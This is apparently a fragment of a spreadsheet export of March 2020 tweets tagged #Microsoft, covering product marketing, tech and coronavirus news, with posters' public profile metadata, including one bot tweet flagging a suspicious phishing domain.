    <t>Schools don't always have the resources to dedicate to threat detection, but you can add a member to your team that can help. #Microsoft is using AI to scan, understand, and respond to threats as they evolve, so you don't have to. https://t.co/7qUBlHCbDK</t>
  </si>
  <si>
    <t>{'id': 26173406, 'id_str': '26173406', 'name': 'Netbase Solutions', 'screen_name': 'NBS_Australia', 'location': 'Sunshine Coast Australia', 'description': 'Office 365 advocate, innovator, educator and recreational pilot. My goal - assist businesses increase profits using Office 365 and SharePoint Online', 'url': 'https://t.co/SyuHznKLqq', 'entities': {'url': {'urls': [{'url': 'https://t.co/SyuHznKLqq', 'expanded_url': 'https://netbasesolutions.com/', 'display_url': 'netbasesolutions.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 485, 'friends_count': 1937, 'listed_count': 16, 'created_at': 'Tue Mar 24 03:59:19 +0000 2009', 'favourites_count': 62, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 1073,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'http://pbs.twimg.com/profile_images/1131425013872021504/ULm9S4Af_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1131425013872021504/ULm9S4Af_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/26173406/1558587498', 'profile_link_color': '81B63B',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</si>
  <si>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Mar 04 01:07:53 +0000 2020</t>
  </si>
  <si>
    <t>@Microsoft users: Get ready to see new icons for your apps like Alarms &amp;amp; Clock, Calculator, Mail, and Calendar! @ZDNet #Microsoft #Windows #TuesdayThoughts #cdwsocial https://t.co/wIXrqQQQp3</t>
  </si>
  <si>
    <t>Wed Mar 04 01:07:13 +0000 2020</t>
  </si>
  <si>
    <t>When the time came for the University of Arizona to consolidate their multiple Active Directory domains and modernize their internal network, CatNet, they trusted #Microsoft for a smooth transition and a focus on security. https://t.co/QIHX2CyX9U https://t.co/8fPaJbhbC8</t>
  </si>
  <si>
    <t>{'id': 839021605753774080, 'id_str': '839021605753774080', 'name': 'Iverson Technology', 'screen_name': 'iverson_info', 'location': 'Jakarta Pusat, DKI Jakarta', 'description': 'Official Account of your Best IT Partner in Learning Center and Solution Business. We Train People, Simplify Processes, and Applying Technology for you..', 'url': 'https://t.co/eoB2HsK169', 'entities': {'url': {'urls': [{'url': 'https://t.co/eoB2HsK169', 'expanded_url': 'http://www.iverson.co.id', 'display_url': 'iverson.co.id', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 13, 'friends_count': 47, 'listed_count': 0, 'created_at': 'Tue Mar 07 07:55:13 +0000 2017', 'favourites_count': 48, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 313,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'http://pbs.twimg.com/profile_images/839031349621055488/5gsrFxWs_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/839031349621055488/5gsrFxWs_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/839021605753774080/1532510134',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</si>
  <si>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01:06:05 +0000 2020</t>
  </si>
  <si>
    <t>Make life easier for your teachers with these simple, time-saving #Windows10 shortcuts.      #EducationalTechnology #K12 #MicrosoftEducation #Microsoft https://t.co/qrSMsjgGGO</t>
  </si>
  <si>
    <t>{'id': 871283159031201793, 'id_str': '871283159031201793', 'name': 'Creative WebMatrix Solutions', 'screen_name': 'SoBCreative2', 'location': 'Dawson Creek, British Columbia', 'description': 'Microsoft Partner working towards Digital Transformation, Business Consulting, Software Development +', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 153, 'friends_count': 931, 'listed_count': 2, 'created_at': 'Sun Jun 04 08:31:07 +0000 2017', 'favourites_count': 134, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 2991,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'http://pbs.twimg.com/profile_images/996845125669093376/UFo4g3Vs_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/996845125669093376/UFo4g3Vs_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/871283159031201793/1566545413', 'profile_link_color': '981CEB',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</si>
  <si>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Mar 04 01:04:23 +0000 2020</t>
  </si>
  <si>
    <t>If you value your data, you want the highest performing data platform on the market. #1 in price and performance with massive scale, #Microsoft @SQLServer 2017 is the ultimate data platform. https://t.co/nIlmyA3Tkd</t>
  </si>
  <si>
    <t>{'id': 946887864666636288, 'id_str': '946887864666636288', 'name': 'Danquah Group LLC', 'screen_name': 'dgroup_llc', 'location': 'California, USA', 'description': 'Danquah Group, LLC is a professional service firm with expertise in project delivery, economics analysis, technology solutions, leadership and governance.', 'url': 'https://t.co/YtO2LI0FPV', 'entities': {'url': {'urls': [{'url': 'https://t.co/YtO2LI0FPV', 'expanded_url': 'http://www.danquahgroup.com', 'display_url': 'danquahgroup.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 20, 'friends_count': 62, 'listed_count': 0, 'created_at': 'Fri Dec 29 23:37:14 +0000 2017', 'favourites_count': 9, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 145,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'http://pbs.twimg.com/profile_images/1000066810912227328/nWJDI2k6_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1000066810912227328/nWJDI2k6_normal.jpg',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</si>
  <si>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01:03:58 +0000 2020</t>
  </si>
  <si>
    <t>From mobility apps to #Office365 productivity tools to collaboration apps to #PowerBI analytics, #Microsoft #Teams delivers everything you need to keep schedules and projects all in one place. https://t.co/gZMabSxNUR</t>
  </si>
  <si>
    <t>Wed Mar 04 01:03:00 +0000 2020</t>
  </si>
  <si>
    <t>Cloud major Oracle on Tuesday announced it is postponing the flagship OpenWorld Asia, currently scheduled for April 2020 in Singapore, owing to the new coronavirus(COVID-19) concerns.  #Coronavirus #Coronavirusoutbreak #facebook #google #microsoft #Oracle https://t.co/cOghs0hbed https://t.co/tyVJuWXW6U</t>
  </si>
  <si>
    <t>{'id': 1044264322111803393, 'id_str': '1044264322111803393', 'name': 'LoudFact.com', 'screen_name': 'loudfactcom', 'location': 'USA', 'description': 'To get FactsðŸ“£, TipsðŸ—¯, AdviceðŸ’¬ and Reviews  on  Relationship - Health - Inspiration - Entertainment - Technology - Travel. Visit #LoudFact nowâ¬‡ï¸', 'url': 'https://t.co/Any9gcoe7T', 'entities': {'url': {'urls': [{'url': 'https://t.co/Any9gcoe7T', 'expanded_url': 'https://loudfact.com', 'display_url': 'loudfact.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 47, 'friends_count': 135, 'listed_count': 0, 'created_at': 'Mon Sep 24 16:36:30 +0000 2018', 'favourites_count': 14, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 969,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'http://pbs.twimg.com/profile_images/1048336236341952512/LmmIpCjq_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1048336236341952512/LmmIpCjq_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1044264322111803393/1578953068', 'profile_link_color': 'FF0101',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</si>
  <si>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01:02:24 +0000 2020</t>
  </si>
  <si>
    <t>Discover how #Microsoft technology is used to analyze young Braylon O'Neill's gait mechanics, enabling him to do more and achieve more. https://t.co/QOKVfnDZ2u</t>
  </si>
  <si>
    <t>{'id': 388026886, 'id_str': '388026886', 'name': 'Noverus Innovations', 'screen_name': 'noverus', 'location': 'California, USA', 'description': 'We are your IT, marketing, and media answer all in one. We cultivate a tireless work ethic while delivering excellent customer service.', 'url': 'https://t.co/HaTXagkQIJ', 'entities': {'url': {'urls': [{'url': 'https://t.co/HaTXagkQIJ', 'expanded_url': 'https://www.noverus.com', 'display_url': 'noverus.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 105, 'friends_count': 36, 'listed_count': 3, 'created_at': 'Mon Oct 10 02:07:54 +0000 2011', 'favourites_count': 0, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 1083,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'http://pbs.twimg.com/profile_images/674433596480864257/Rr8uvLTt_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/674433596480864257/Rr8uvLTt_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/388026886/1449632682',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</si>
  <si>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01:00:59 +0000 2020</t>
  </si>
  <si>
    <t>Fashion e-retailer Stitch Fix is the algorithm queen, taking #datascience to new heights. With #Microsoft #PowerBI and #Azure, R-TEL can help you bring powerful #AI insights into your company. https://t.co/NPnzNRzW30</t>
  </si>
  <si>
    <t>{'id': 216069994, 'id_str': '216069994', 'name': 'r-tel.net', 'screen_name': 'rtelnet', 'location': 'USA', 'description': 'Cloud Solutions for Small Business', 'url': 'https://t.co/eXCH9CdX7P', 'entities': {'url': {'urls': [{'url': 'https://t.co/eXCH9CdX7P', 'expanded_url': 'https://www.r-tel.net', 'display_url': 'r-tel.net', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 5, 'friends_count': 17, 'listed_count': 1, 'created_at': 'Mon Nov 15 18:27:32 +0000 2010', 'favourites_count': 3, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 3600,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'http://pbs.twimg.com/profile_images/963422259942588416/ESY9Hjd6_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/963422259942588416/ESY9Hjd6_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/216069994/1579498639',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</si>
  <si>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Mar 04 01:00:16 +0000 2020</t>
  </si>
  <si>
    <t>My personal website. Senior Software Engineer. Specialized in #Microsoft Technologies including #dotnet #dotnetcore &amp;amp; #Azure 
https://t.co/bXH8SPnIBs https://t.co/jiz50YsM8H</t>
  </si>
  <si>
    <t>Wed Mar 04 00:58:20 +0000 2020</t>
  </si>
  <si>
    <t>[Archive] Supported Active Directory environments for #Microsoft #Exchange https://t.co/H12EDwG5xC</t>
  </si>
  <si>
    <t>Wed Mar 04 00:55:36 +0000 2020</t>
  </si>
  <si>
    <t>Google and Microsoft are giving away enterprise conferencing tools due to coronavirus. [Via @verge ] 
https://t.co/cuyaZmNIKJ #google #microsoft</t>
  </si>
  <si>
    <t>{'id': 107305567, 'id_str': '107305567', 'name': 'Dave Noseworthy', 'screen_name': 'davnosworthy', 'location': 'Newfoundland and Labrador, Can', 'description': 'Passionate about anything cannabis, mobile and digital.', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 136, 'friends_count': 508, 'listed_count': 3, 'created_at': 'Fri Jan 22 04:07:48 +0000 2010', 'favourites_count': 1104, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 39, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': True, 'profile_background_color': '000000', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme14/bg.gif', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme14/bg.gif', 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1234968624642826240/n8VIqJ8O_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1234968624642826240/n8VIqJ8O_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/107305567/1579190294', 'profile_link_color': '000000', 'profile_sidebar_border_color': '000000', 'profile_sidebar_fill_color': '000000', 'profile_text_color': 'B50404', 'profile_use_background_image': True, 'has_extended_profile': True, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Wed Mar 04 00:51:35 +0000 2020</t>
  </si>
  <si>
    <t>Make life easier for your teachers with these simple, time-saving #Windows10 shortcuts.      #EducationalTechnology #K12 #MicrosoftEducation #Microsoft https://t.co/Tj5IthzLSH</t>
  </si>
  <si>
    <t>{'id': 814151432, 'id_str': '814151432', 'name': 'RetoMarket', 'screen_name': 'RetoMarket', 'location': 'Toronto, Ontario', 'description': 'Internet-Connect', 'url': 'https://t.co/7a18BmOBHg', 'entities': {'url': {'urls': [{'url': 'https://t.co/7a18BmOBHg', 'expanded_url': 'http://RetoMarket.com', 'display_url': 'RetoMarket.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 590, 'friends_count': 581, 'listed_count': 5, 'created_at': 'Mon Sep 10 00:27:01 +0000 2012', 'favourites_count': 25, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 3360,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'http://pbs.twimg.com/profile_images/2594389000/RetoMarketlogo3_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/2594389000/RetoMarketlogo3_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/814151432/1517949969',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</si>
  <si>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00:50:05 +0000 2020</t>
  </si>
  <si>
    <t>@BillGates says the coronavirus is a pandemic and a 'once-in-a-century pathogen.' Here are the solutions he's proposing to fight it. #BillGates #Coronavirus #Science #Health #Pandemic #Tech #Microsoft #STEM via @YahooNews</t>
  </si>
  <si>
    <t>{'id': 105150346, 'id_str': '105150346', 'name': 'Dorothea Bozicolona-Volpe', 'screen_name': 'SocialEspionage', 'location': 'Citizen of the World', 'description': 'Citizen of the world. Marketing &amp; Business Strategist. TEDx Speaker. Embraces Tech. Avid Skateboarder. Traveler not a Tourist. Tweets to relax.', 'url': 'https://t.co/ie5GveDwmt', 'entities': {'url': {'urls': [{'url': 'https://t.co/ie5GveDwmt', 'expanded_url': 'http://wefollow.com/SocialEspionage', 'display_url': 'wefollow.com/SocialEspionage', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 4623, 'friends_count': 859, 'listed_count': 296, 'created_at': 'Fri Jan 15 14:14:53 +0000 2010', 'favourites_count': 1807, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 42890,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'http://pbs.twimg.com/profile_images/1220962449/DBV_SM3_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1220962449/DBV_SM3_normal.jpg',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</si>
  <si>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Mar 04 00:49:38 +0000 2020</t>
  </si>
  <si>
    <t>Wed Mar 04 00:48:53 +0000 2020</t>
  </si>
  <si>
    <t>Cisco Data Intelligence Platform Powered by Cloudera Data Platform https://t.co/vkUwtY5o7N
For more info: https://t.co/Z4OMMQEgT8 #data #security #bigdata #Digitaltransformation #finance #cloud #cybersecurity #CEO #cmo #digital #marketing #microsoft #IOT #internetofthings #dell https://t.co/kFg5U6C2HA</t>
  </si>
  <si>
    <t>Wed Mar 04 00:45:20 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft Role-based Certification Options 
"As we continue to grow our Microsoft role-based certification, all remaining MCSA, MCSD, MCSE certifications and associated exams are scheduled to fully retire on June 30, 2020" by Microsoft
#dataplusitsolutions #Microsoft https://t.co/T3Ukh7DIzR</t>
  </si>
  <si>
    <t>{'id': 1227408991250042880, 'id_str': '1227408991250042880', 'name': 'DataPlusITsolutions', 'screen_name': 'DataPlusITSol', 'location': 'Quezon City Philippines', 'description': 'IT Consultation, Migration, Services', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 0, 'friends_count': 0, 'listed_count': 0, 'created_at': 'Wed Feb 12 01:48:25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'http://pbs.twimg.com/profile_images/1227409147739529217/rN-26IGG_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1227409147739529217/rN-26IGG_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1227408991250042880/1581564689',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</si>
  <si>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00:44:57 +0000 2020</t>
  </si>
  <si>
    <t>Twitter got some very fine boys #Little Rock   #perfume #microsoft https://t.co/9x20wQScjd</t>
  </si>
  <si>
    <t>{'id': 1234824423292665856, 'id_str': '1234824423292665856', 'name': 'Lisa Velasquez', 'screen_name': 'celpercgastcist', 'location': 'Manchester, USA', 'description': 'Pleasure of love lasts but a moment. Pain of love lasts a lifetime.', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 6, 'friends_count': 29, 'listed_count': 0, 'created_at': 'Tue Mar 03 12:54:24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'http://pbs.twimg.com/profile_images/1234847587120877571/MZFldsot_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1234847587120877571/MZFldsot_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1234824423292665856/1583245623',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</si>
  <si>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00:43:41 +0000 2020</t>
  </si>
  <si>
    <t>Quick winssingle sign-on (SSO) and Multi-Factor Authentication (MFA) https://t.co/PNGiyXYeKZ #microsoft #feedly</t>
  </si>
  <si>
    <t>Wed Mar 04 00:43:15 +0000 2020</t>
  </si>
  <si>
    <t>Running, Scheduling and Monitoring Elastic Jobs in Azure SQL Database https://t.co/J4qs7GN5PD #microsoft #feedly</t>
  </si>
  <si>
    <t>Wed Mar 04 00:42:42 +0000 2020</t>
  </si>
  <si>
    <t>Thanks #Microsoft... I guess I'll play #Halo in three years.  https://t.co/id3dj4Uisj</t>
  </si>
  <si>
    <t>{'id': 26341602, 'id_str': '26341602', 'name': '[TSAN] James Saville', 'screen_name': 'slevinkalevera', 'location': 'Muskegon, MI', 'description': 'Variety Streamer, Gamer, Computer and Cat Enthusiast. @TwitchSAndN FB Admin\n\nhttps://t.co/qY7s0ca1nz', 'url': 'https://t.co/qY7s0ca1nz', 'entities': {'url': {'urls': [{'url': 'https://t.co/qY7s0ca1nz', 'expanded_url': 'http://twitch.tv/slevinkalevera', 'display_url': 'twitch.tv/slevinkalevera', 'indices': [0, 23]}]}, 'description': {'urls': [{'url': 'https://t.co/qY7s0ca1nz', 'expanded_url': 'http://twitch.tv/slevinkalevera', 'display_url': 'twitch.tv/slevinkalevera', 'indices': [77, 100]}]}}, 'protected': False, 'followers_count': 757, 'friends_count': 225, 'listed_count': 11, 'created_at': 'Tue Mar 24 22:27:08 +0000 2009', 'favourites_count': 6421, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 17126,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'http://pbs.twimg.com/profile_images/1152296706576474113/YBwlYRrR_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1152296706576474113/YBwlYRrR_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/26341602/1563142449', 'profile_link_color': 'E81C4F', 'profile_sidebar_border_color': '000000', 'profile_sidebar_fill_color': '460303', 'profile_text_color': 'FFFFFF', 'profile_use_background_image': True, 'has_extended_profile': True, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Wed Mar 04 00:41:11 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft Unveils A Couple Of New Xbox One Controllers https://t.co/P2lvJKYx7a #Microsoft</t>
  </si>
  <si>
    <t>Wed Mar 04 00:40:02 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft Safe Documents keeps all your files protected https://t.co/LatnzdGuKt #cybersecurity  #TechJunkieNews https://t.co/59TTNhnx5Y</t>
  </si>
  <si>
    <t>{'id': 3064266184, 'id_str': '3064266184', 'name': 'Tech Junkie', 'screen_name': 'techjunkiejh', 'location': '', 'description': 'https://t.co/mVXNWwBD1G , promoter of coding. Coding should be fun. How you think is just as important as what you think. News,games,Movies,TV, invest junkie', 'url': 'https://t.co/IAUcQUfG4o', 'entities': {'url': {'urls': [{'url': 'https://t.co/IAUcQUfG4o', 'expanded_url': 'http://www.techjunkieblog.com', 'display_url': 'techjunkieblog.com', 'indices': [0, 23]}]}, 'description': {'urls': [{'url': 'https://t.co/mVXNWwBD1G', 'expanded_url': 'http://techjunkieblog.com', 'display_url': 'techjunkieblog.com', 'indices': [0, 23]}]}}, 'protected': False, 'followers_count': 29059, 'friends_count': 25178, 'listed_count': 6470, 'created_at': 'Fri Feb 27 00:58:22 +0000 2015', 'favourites_count': 14066, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 257179,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'http://pbs.twimg.com/profile_images/587160065536299009/9MBFPj6a_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/587160065536299009/9MBFPj6a_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/3064266184/1465744133',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</si>
  <si>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00:36:17 +0000 2020</t>
  </si>
  <si>
    <t>The evolution of brick and mortars purpose...
https://t.co/yTzldkoCBa
#store #experience #shoppers #userexperience #shoppingexperience #supertuesday #discovery #fulfillment #storage #warehouse #retail #fashion #nyc #salesforce  #magento #shopify #microsoft #virus #coronavirus https://t.co/FScfRWRwhe</t>
  </si>
  <si>
    <t>{'id': 1222005964968165376, 'id_str': '1222005964968165376', 'name': 'Bizmia', 'screen_name': 'Bizmiallc', 'location': 'New Jersey, USA', 'description': 'Digital Transformation - Consulting - IT Services', 'url': 'https://t.co/wwRSNjH8I8', 'entities': {'url': {'urls': [{'url': 'https://t.co/wwRSNjH8I8', 'expanded_url': 'http://www.bizmia.net', 'display_url': 'bizmia.net', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 6, 'friends_count': 26, 'listed_count': 0, 'created_at': 'Tue Jan 28 03:58:41 +0000 2020', 'favourites_count': 0, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 25, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1222006490531270656/RsO739JU_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1222006490531270656/RsO739JU_normal.jpg',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</si>
  <si>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00:34:59 +0000 2020</t>
  </si>
  <si>
    <t>This new @WBCSD case study shows how #Microsoft  a member of our Future of Work project  is harnessing the power of #AI to promote economic and social #inclusion for people with disabilities. 
https://t.co/yqW3i6YzZz https://t.co/sg93TJCBfX</t>
  </si>
  <si>
    <t>{'id': 1158459412626980864, 'id_str': '1158459412626980864', 'name': 'William Sisson', 'screen_name': 'WSissonWBCSD', 'location': 'United States', 'description': 'Executive Director of @WBCSD North America: Guiding CEOs to collaborate on science-based targets re: #climatechange &amp; #sustainabledevelopment. Tweets my own.', 'url': 'https://t.co/QF3rdut1tz', 'entities': {'url': {'urls': [{'url': 'https://t.co/QF3rdut1tz', 'expanded_url': 'https://www.linkedin.com/in/wsissonwbcsd', 'display_url': 'linkedin.com/in/wsissonwbcsd', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 325, 'friends_count': 524, 'listed_count': 7, 'created_at': 'Mon Aug 05 19:27:01 +0000 2019', 'favourites_count': 3599, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 328, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1181603493469200384/C6mOozZ0_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1181603493469200384/C6mOozZ0_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1158459412626980864/1565201262',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</si>
  <si>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00:32:19 +0000 2020</t>
  </si>
  <si>
    <t>Throwback to geeking out with Deloitte's Chief Strategy Officer Steven Goldbach, at Microsoft NY, about business &amp;amp; digital transformation.
| #digitaltransformation #business #strategy #microsoft #deloitte https://t.co/Z6bMtmufxV</t>
  </si>
  <si>
    <t>{'id': 1094710881940881409, 'id_str': '1094710881940881409', 'name': 'Mitesh M Motwani', 'screen_name': 'ROIrootsdotcom', 'location': 'United States', 'description': '- Analytics, Strategy, Growth &amp; Innovation\n\n- Harvard, Wharton &amp; MIT Exec\n\n- Avid Long-Term Investor\n\n| #Business #Marketing #Analytics #Strategy #Innovation', 'url': 'https://t.co/UV7nVe88gw', 'entities': {'url': {'urls': [{'url': 'https://t.co/UV7nVe88gw', 'expanded_url': 'http://ROIRoots.com', 'display_url': 'ROIRoots.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 7, 'friends_count': 8, 'listed_count': 1, 'created_at': 'Sun Feb 10 21:33:07 +0000 2019', 'favourites_count': 2, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 43, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1094713549421793281/KmxN9GKw_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1094713549421793281/KmxN9GKw_normal.jpg',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</si>
  <si>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00:31:51 +0000 2020</t>
  </si>
  <si>
    <t>Installing Windows Server 2019 as a VMWare Workstation VM Part 1 https://t.co/JZXVLSH5Jp via @YouTube #Microsoft #Windows #Server</t>
  </si>
  <si>
    <t>Wed Mar 04 00:31:38 +0000 2020</t>
  </si>
  <si>
    <t>#Cisco spreads ACI to #Microsoft Azure, #multicloud and SD-WAN environments https://t.co/7joG2YtNov https://t.co/d6HCaaEK1B</t>
  </si>
  <si>
    <t>{'id': 3220869367, 'id_str': '3220869367', 'name': 'Imagit Solutions', 'screen_name': 'ImagitSolutions', 'location': 'Chicago, IL', 'description': 'Imagit is an expert #informationtechnology provider specializing in multi-site #network #engineering. We help partners expand capabilities &amp; coverage!', 'url': 'http://t.co/JG9fLWd8MX', 'entities': {'url': {'urls': [{'url': 'http://t.co/JG9fLWd8MX', 'expanded_url': 'http://www.imagit.com', 'display_url': 'imagit.com', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 1150, 'friends_count': 935, 'listed_count': 88, 'created_at': 'Tue May 19 23:31:14 +0000 2015', 'favourites_count': 8486, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 4100,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'http://pbs.twimg.com/profile_images/1123600909907394560/-9bV9cJT_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1123600909907394560/-9bV9cJT_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/3220869367/1556722435', 'profile_link_color': '1930A1',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</si>
  <si>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00:31:17 +0000 2020</t>
  </si>
  <si>
    <t>Installing Windows Server 2019 as a VM on VMWare Workstation Part 2 https://t.co/WL1BmjaSoD via @YouTube #Microsoft #Windows #Server</t>
  </si>
  <si>
    <t>Wed Mar 04 00:29:47 +0000 2020</t>
  </si>
  <si>
    <t>Windows 10 2004 build preview and thoughts https://t.co/HQ9Win2wkw via @YouTube
#windows #tutorial #linux #android #apple #firefox #steam #opensource #wndows10 #microsoft #kde #plasma #debian #gimalaji_blake</t>
  </si>
  <si>
    <t>Wed Mar 04 00:25:40 +0000 2020</t>
  </si>
  <si>
    <t>Reflecting on a genuinely great feedback session today with @JP_Courtois and @CindyRose discussing #AzureExpert proud @SoftwareONEuk was invited to participate @msPartner #Microsoft #SoftwareONE</t>
  </si>
  <si>
    <t>{'id': 79583296, 'id_str': '79583296', 'name': 'Andy Dunbar', 'screen_name': 'Andy_Dunbar', 'location': 'Liverpool, England', 'description': 'Dad, Husband, Kopite, Old Lerpoolian, occasional house DJ, charity trustee, advocate of cloud technology &amp; Dance Dad. Work @SoftwareONE - all tweets are my own', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 441, 'friends_count': 1042, 'listed_count': 9, 'created_at': 'Sat Oct 03 22:45:28 +0000 2009', 'favourites_count': 4282, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 13271,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'http://pbs.twimg.com/profile_images/1213199773471256576/JBmVwHOf_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1213199773471256576/JBmVwHOf_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/79583296/1382305627',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</si>
  <si>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Mar 04 00:25:22 +0000 2020</t>
  </si>
  <si>
    <t>via #BleepingComputer Blog: "Let's Encrypt to Revoke 3 Million TLS Certificates Due to Bug:" https://t.co/uE6DiEZh9w
.
.
.
#Microsoft #Linux #blog #virtualization #cloudcomputing #cloud #security #ransomeware</t>
  </si>
  <si>
    <t>Wed Mar 04 00:23:13 +0000 2020</t>
  </si>
  <si>
    <t>#Healthcare is going to become more connected and intelligent, home or non-hospital based, and exceedingly personalized over the next five years. 
Learn how Microsoft can help: https://t.co/BN07d9sVlH https://t.co/X5L1jolq53 #Microsoft</t>
  </si>
  <si>
    <t>Wed Mar 04 00:20:02 +0000 2020</t>
  </si>
  <si>
    <t>Chrome vs Edge: #Google is afraid of #Microsofts browser https://t.co/7sDvego5UW #TechJunkieNews https://t.co/68DqGUpckh</t>
  </si>
  <si>
    <t>Wed Mar 04 00:16:29 +0000 2020</t>
  </si>
  <si>
    <t>We have just found a new suspicious domain.
Domain: rumusmicrosoft[.]com
IP: 165[.]22[.]244[.]252
bot-tweet #phishing #cybersecurity #microsoft https://t.co/O22RwEFs5C</t>
  </si>
  <si>
